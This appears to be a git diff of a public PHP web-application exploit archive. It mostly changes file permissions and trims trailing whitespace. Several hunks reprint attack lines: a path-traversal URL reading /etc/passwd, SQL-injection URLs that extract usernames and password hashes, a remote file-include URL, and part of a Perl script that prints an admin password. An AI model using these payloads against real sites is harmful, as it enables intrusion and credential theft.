100644 diff --git a/platforms/php/webapps/12233.txt b/platforms/php/webapps/12233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12234.txt b/platforms/php/webapps/12234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12235.txt b/platforms/php/webapps/12235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12236.txt b/platforms/php/webapps/12236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12237.txt b/platforms/php/webapps/12237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12238.txt b/platforms/php/webapps/12238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12239.txt b/platforms/php/webapps/12239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12241.txt b/platforms/php/webapps/12241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12245.txt b/platforms/php/webapps/12245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12246.txt b/platforms/php/webapps/12246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12249.txt b/platforms/php/webapps/12249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1225.php b/platforms/php/webapps/1225.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12251.php b/platforms/php/webapps/12251.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12254.txt b/platforms/php/webapps/12254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12256.txt b/platforms/php/webapps/12256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12257.txt b/platforms/php/webapps/12257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1226.php b/platforms/php/webapps/1226.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12260.txt b/platforms/php/webapps/12260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12262.php b/platforms/php/webapps/12262.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12266.txt b/platforms/php/webapps/12266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12267.txt b/platforms/php/webapps/12267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12268.txt b/platforms/php/webapps/12268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12269.txt b/platforms/php/webapps/12269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1227.php b/platforms/php/webapps/1227.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12270.txt b/platforms/php/webapps/12270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12272.txt b/platforms/php/webapps/12272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12276.txt b/platforms/php/webapps/12276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12277.txt b/platforms/php/webapps/12277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12278.txt b/platforms/php/webapps/12278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12279.txt b/platforms/php/webapps/12279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12280.txt b/platforms/php/webapps/12280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12282.txt b/platforms/php/webapps/12282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12283.txt b/platforms/php/webapps/12283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12284.txt b/platforms/php/webapps/12284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12285.txt b/platforms/php/webapps/12285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12286.txt b/platforms/php/webapps/12286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12287.txt b/platforms/php/webapps/12287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12288.txt b/platforms/php/webapps/12288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12289.txt b/platforms/php/webapps/12289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12290.txt b/platforms/php/webapps/12290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12291.txt b/platforms/php/webapps/12291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12292.txt b/platforms/php/webapps/12292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12295.txt b/platforms/php/webapps/12295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12296.txt b/platforms/php/webapps/12296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12299.txt b/platforms/php/webapps/12299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12301.txt b/platforms/php/webapps/12301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12305.txt b/platforms/php/webapps/12305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12306.txt b/platforms/php/webapps/12306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12313.txt b/platforms/php/webapps/12313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12315.txt b/platforms/php/webapps/12315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12316.txt b/platforms/php/webapps/12316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12317.txt b/platforms/php/webapps/12317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12318.txt b/platforms/php/webapps/12318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12319.txt b/platforms/php/webapps/12319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12322.txt b/platforms/php/webapps/12322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12323.txt b/platforms/php/webapps/12323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12325.txt b/platforms/php/webapps/12325.txt old mode 100755 new mode 100644 index 3d09f0faf..62d0366f0 --- a/platforms/php/webapps/12325.txt +++ b/platforms/php/webapps/12325.txt @@ -10,6 +10,4 @@ dork :inurl:index.php?option=com_portfolio exp: -http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd - - \ No newline at end of file +http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/12330.txt b/platforms/php/webapps/12330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12333.txt b/platforms/php/webapps/12333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12338.txt b/platforms/php/webapps/12338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12339.txt b/platforms/php/webapps/12339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12340.txt b/platforms/php/webapps/12340.txt deleted file mode 100755 index 693e85590..000000000 --- a/platforms/php/webapps/12340.txt +++ /dev/null @@ -1,11 +0,0 @@ -# Exploit Title: [Vulnerability in Joomla Component com_caddy] -# Date: [2010-04-22] -# Author: [_SuBz3r0_] -# Software Link: [] -# Joomla Component: [com_caddy] -# Tested on: [] -# CVE : [if exists] -# Code : - -Just use for example the firefox addon tamper data while adding a product to the cart. Then look at the requests and specially have a look at your POST request.... -Either you modify the post request or if you want you could also transform the POST into GET request and paste it in the URL. \ No newline at end of file diff --git a/platforms/php/webapps/12345.txt b/platforms/php/webapps/12345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12346.txt b/platforms/php/webapps/12346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12349.txt b/platforms/php/webapps/12349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12350.txt b/platforms/php/webapps/12350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12351.txt b/platforms/php/webapps/12351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12353.txt b/platforms/php/webapps/12353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12355.pl b/platforms/php/webapps/12355.pl index 101c717ad..3651f43c8 100755 --- a/platforms/php/webapps/12355.pl +++ b/platforms/php/webapps/12355.pl @@ -35,4 +35,4 @@ $answer = $res->content; if ($answer =~ /password=(.*?)<\/div>/){ print "\n[+] Admin password : $1\n\n"; } else{print "\nError\n"; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/12358.txt b/platforms/php/webapps/12358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12359.txt b/platforms/php/webapps/12359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12361.txt b/platforms/php/webapps/12361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12364.txt b/platforms/php/webapps/12364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12365.txt b/platforms/php/webapps/12365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12366.txt b/platforms/php/webapps/12366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12369.txt b/platforms/php/webapps/12369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1237.php b/platforms/php/webapps/1237.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12370.txt b/platforms/php/webapps/12370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12371.txt b/platforms/php/webapps/12371.txt old mode 100755 new mode 100644 index 2ec1fe0b4..0cff8ae62 --- a/platforms/php/webapps/12371.txt +++ b/platforms/php/webapps/12371.txt @@ -28,4 +28,4 @@ HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM site: www.mixaty.com -E: hackereg@hotmail.com \ No newline at end of file +E: hackereg@hotmail.com \ No newline at end of file diff --git a/platforms/php/webapps/12372.txt b/platforms/php/webapps/12372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12373.txt b/platforms/php/webapps/12373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12374.txt b/platforms/php/webapps/12374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12376.php b/platforms/php/webapps/12376.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12378.txt b/platforms/php/webapps/12378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12381.php b/platforms/php/webapps/12381.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12383.txt b/platforms/php/webapps/12383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12384.txt b/platforms/php/webapps/12384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12385.html b/platforms/php/webapps/12385.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12386.txt b/platforms/php/webapps/12386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12395.txt b/platforms/php/webapps/12395.txt old mode 100755 new mode 100644 index aeebb80f3..e56db35bc --- a/platforms/php/webapps/12395.txt +++ b/platforms/php/webapps/12395.txt @@ -34,8 +34,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- - - - - \ No newline at end of file + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- \ No newline at end of file diff --git a/platforms/php/webapps/12396.txt b/platforms/php/webapps/12396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12398.txt b/platforms/php/webapps/12398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12399.txt b/platforms/php/webapps/12399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1240.php b/platforms/php/webapps/1240.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12400.txt b/platforms/php/webapps/12400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12402.txt b/platforms/php/webapps/12402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12407.txt b/platforms/php/webapps/12407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1241.php b/platforms/php/webapps/1241.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12410.txt b/platforms/php/webapps/12410.txt old mode 100755 new mode 100644 index 5ae4e3808..9b4085834 --- a/platforms/php/webapps/12410.txt +++ b/platforms/php/webapps/12410.txt @@ -26,10 +26,4 @@ modules.php?op=modload&name=News&file=article&sid=[ SQL ] [ Demo] -http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- - - - - - - \ No newline at end of file +http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- \ No newline at end of file diff --git a/platforms/php/webapps/12411.txt b/platforms/php/webapps/12411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12412.txt b/platforms/php/webapps/12412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12413.txt b/platforms/php/webapps/12413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12414.txt b/platforms/php/webapps/12414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12415.txt b/platforms/php/webapps/12415.txt old mode 100755 new mode 100644 index 922fd4ba7..54842b6b2 --- a/platforms/php/webapps/12415.txt +++ b/platforms/php/webapps/12415.txt @@ -22,7 +22,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- - - - \ No newline at end of file + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- \ No newline at end of file diff --git a/platforms/php/webapps/12416.txt b/platforms/php/webapps/12416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12419.txt b/platforms/php/webapps/12419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12420.php b/platforms/php/webapps/12420.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12421.txt b/platforms/php/webapps/12421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12423.txt b/platforms/php/webapps/12423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12426.txt b/platforms/php/webapps/12426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12427.txt b/platforms/php/webapps/12427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12428.txt b/platforms/php/webapps/12428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12430.txt b/platforms/php/webapps/12430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12432.txt b/platforms/php/webapps/12432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12435.txt b/platforms/php/webapps/12435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12436.txt b/platforms/php/webapps/12436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12438.txt b/platforms/php/webapps/12438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12439.txt b/platforms/php/webapps/12439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12440.txt b/platforms/php/webapps/12440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12441.html b/platforms/php/webapps/12441.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12442.txt b/platforms/php/webapps/12442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12443.txt b/platforms/php/webapps/12443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12444.txt b/platforms/php/webapps/12444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12445.txt b/platforms/php/webapps/12445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12446.txt b/platforms/php/webapps/12446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12447.txt b/platforms/php/webapps/12447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12448.txt b/platforms/php/webapps/12448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12449.txt b/platforms/php/webapps/12449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1245.php b/platforms/php/webapps/1245.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12451.txt b/platforms/php/webapps/12451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12452.txt b/platforms/php/webapps/12452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12453.txt b/platforms/php/webapps/12453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12454.txt b/platforms/php/webapps/12454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12455.txt b/platforms/php/webapps/12455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12456.txt b/platforms/php/webapps/12456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12458.txt b/platforms/php/webapps/12458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12459.txt b/platforms/php/webapps/12459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12460.txt b/platforms/php/webapps/12460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12461.txt b/platforms/php/webapps/12461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12462.txt b/platforms/php/webapps/12462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12463.txt b/platforms/php/webapps/12463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12465.txt b/platforms/php/webapps/12465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12466.txt b/platforms/php/webapps/12466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12467.txt b/platforms/php/webapps/12467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12468.txt b/platforms/php/webapps/12468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12472.txt b/platforms/php/webapps/12472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12473.txt b/platforms/php/webapps/12473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12474.txt b/platforms/php/webapps/12474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12475.txt b/platforms/php/webapps/12475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12476.txt b/platforms/php/webapps/12476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12479.txt b/platforms/php/webapps/12479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12481.txt b/platforms/php/webapps/12481.txt old mode 100755 new mode 100644 index df0ad8b01..13e39bacd --- a/platforms/php/webapps/12481.txt +++ b/platforms/php/webapps/12481.txt @@ -22,4 +22,4 @@ HaMaDa SCoOoRPioN site: www.mixaty.com -E: hackereg@hotmail.com \ No newline at end of file +E: hackereg@hotmail.com \ No newline at end of file diff --git a/platforms/php/webapps/12484.txt b/platforms/php/webapps/12484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12485.txt b/platforms/php/webapps/12485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12486.txt b/platforms/php/webapps/12486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12488.txt b/platforms/php/webapps/12488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12489.txt b/platforms/php/webapps/12489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12496.html b/platforms/php/webapps/12496.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12499.txt b/platforms/php/webapps/12499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1250.php b/platforms/php/webapps/1250.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12500.txt b/platforms/php/webapps/12500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12504.txt b/platforms/php/webapps/12504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12506.php b/platforms/php/webapps/12506.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12507.txt b/platforms/php/webapps/12507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12510.php b/platforms/php/webapps/12510.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12514.txt b/platforms/php/webapps/12514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12515.txt b/platforms/php/webapps/12515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12517.txt b/platforms/php/webapps/12517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12519.txt b/platforms/php/webapps/12519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12520.html b/platforms/php/webapps/12520.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12521.txt b/platforms/php/webapps/12521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12522.txt b/platforms/php/webapps/12522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12523.txt b/platforms/php/webapps/12523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12525.txt b/platforms/php/webapps/12525.txt old mode 100755 new mode 100644 index 222952bad..c567ce07c --- a/platforms/php/webapps/12525.txt +++ b/platforms/php/webapps/12525.txt @@ -17,4 +17,4 @@ Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union # Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qas&#305;m, Metrp0l, Despot... -# Says : Hemso bak bi dene bug daha xD ... \ No newline at end of file +# Says : Hemso bak bi dene bug daha xD ... \ No newline at end of file diff --git a/platforms/php/webapps/12532.txt b/platforms/php/webapps/12532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12533.txt b/platforms/php/webapps/12533.txt old mode 100755 new mode 100644 index 6bf556138..a80dad550 --- a/platforms/php/webapps/12533.txt +++ b/platforms/php/webapps/12533.txt @@ -38,4 +38,4 @@ *"""""""""""""""""""" ** Greetz to : ALLAH ** All Members of http://www.DZ4All.cOm/Cc -** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & \ No newline at end of file +** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & \ No newline at end of file diff --git a/platforms/php/webapps/12534.txt b/platforms/php/webapps/12534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12535.txt b/platforms/php/webapps/12535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12539.txt b/platforms/php/webapps/12539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12547.txt b/platforms/php/webapps/12547.txt old mode 100755 new mode 100644 index a237e1fb4..a3a3ca9f8 --- a/platforms/php/webapps/12547.txt +++ b/platforms/php/webapps/12547.txt @@ -30,4 +30,4 @@ ** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword ** ** -************************************************************ \ No newline at end of file +************************************************************ \ No newline at end of file diff --git a/platforms/php/webapps/12551.txt b/platforms/php/webapps/12551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12552.txt b/platforms/php/webapps/12552.txt old mode 100755 new mode 100644 index c537d8d6c..94cf14558 --- a/platforms/php/webapps/12552.txt +++ b/platforms/php/webapps/12552.txt @@ -20,5 +20,4 @@ http://localhost/teknoportal/makale.php?id=-1+union+select+0,1,version(),3,4,5,6 ------------------------------------------------------------------------------------------- -Her&#351;ey Vatan &#304;çin; - \ No newline at end of file +Her&#351;ey Vatan &#304;çin; \ No newline at end of file diff --git a/platforms/php/webapps/12553.txt b/platforms/php/webapps/12553.txt old mode 100755 new mode 100644 index f425ea915..e9e4fcda9 --- a/platforms/php/webapps/12553.txt +++ b/platforms/php/webapps/12553.txt @@ -16,4 +16,4 @@ Exploit: http://localhost/[PATH]/login.php?include_path= [Shell] -------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12556.txt b/platforms/php/webapps/12556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12557.txt b/platforms/php/webapps/12557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12558.txt b/platforms/php/webapps/12558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12560.txt b/platforms/php/webapps/12560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12561.txt b/platforms/php/webapps/12561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12562.txt b/platforms/php/webapps/12562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12563.txt b/platforms/php/webapps/12563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12565.txt b/platforms/php/webapps/12565.txt old mode 100755 new mode 100644 index 72473cb6a..15151cbb5 --- a/platforms/php/webapps/12565.txt +++ b/platforms/php/webapps/12565.txt @@ -22,4 +22,4 @@ http://localhost/[path]/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Sectio Thanks cyberlog ;) -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12566.txt b/platforms/php/webapps/12566.txt old mode 100755 new mode 100644 index f2834fd4d..77c51b01d --- a/platforms/php/webapps/12566.txt +++ b/platforms/php/webapps/12566.txt @@ -24,4 +24,4 @@ http://localhost/[path]/index.php?auto_slide=&ID=-1 [SQL] Thanks cyberlog ;) -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12567.html b/platforms/php/webapps/12567.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12568.txt b/platforms/php/webapps/12568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12569.html b/platforms/php/webapps/12569.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12570.txt b/platforms/php/webapps/12570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12572.txt b/platforms/php/webapps/12572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12574.txt b/platforms/php/webapps/12574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12575.txt b/platforms/php/webapps/12575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12576.txt b/platforms/php/webapps/12576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12577.txt b/platforms/php/webapps/12577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12579.txt b/platforms/php/webapps/12579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12583.txt b/platforms/php/webapps/12583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12584.txt b/platforms/php/webapps/12584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12585.txt b/platforms/php/webapps/12585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12586.php b/platforms/php/webapps/12586.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12590.txt b/platforms/php/webapps/12590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12591.txt b/platforms/php/webapps/12591.txt old mode 100755 new mode 100644 index 20f422163..0af511249 --- a/platforms/php/webapps/12591.txt +++ b/platforms/php/webapps/12591.txt @@ -32,5 +32,4 @@ line ; 51 and 52 my friend : liar - sm Hacker -baby hacker -dmar - mr.JLD - ALhal alsab - adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - - yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - - \ No newline at end of file + yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - \ No newline at end of file diff --git a/platforms/php/webapps/12592.txt b/platforms/php/webapps/12592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12593.txt b/platforms/php/webapps/12593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12594.txt b/platforms/php/webapps/12594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12595.txt b/platforms/php/webapps/12595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12596.txt b/platforms/php/webapps/12596.txt old mode 100755 new mode 100644 index 820bb8ce5..83e209d19 --- a/platforms/php/webapps/12596.txt +++ b/platforms/php/webapps/12596.txt @@ -50,5 +50,4 @@ and when you put {order+by+1} after id you can see the normal page # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- - \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12597.txt b/platforms/php/webapps/12597.txt old mode 100755 new mode 100644 index 47e1cba29..8d7b9edb4 --- a/platforms/php/webapps/12597.txt +++ b/platforms/php/webapps/12597.txt @@ -41,5 +41,4 @@ page.php?id=-4+union+all+select+1,@@version,3,4-- # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- - \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/12598.txt b/platforms/php/webapps/12598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12599.txt b/platforms/php/webapps/12599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12601.txt b/platforms/php/webapps/12601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12607.txt b/platforms/php/webapps/12607.txt old mode 100755 new mode 100644 diff --git 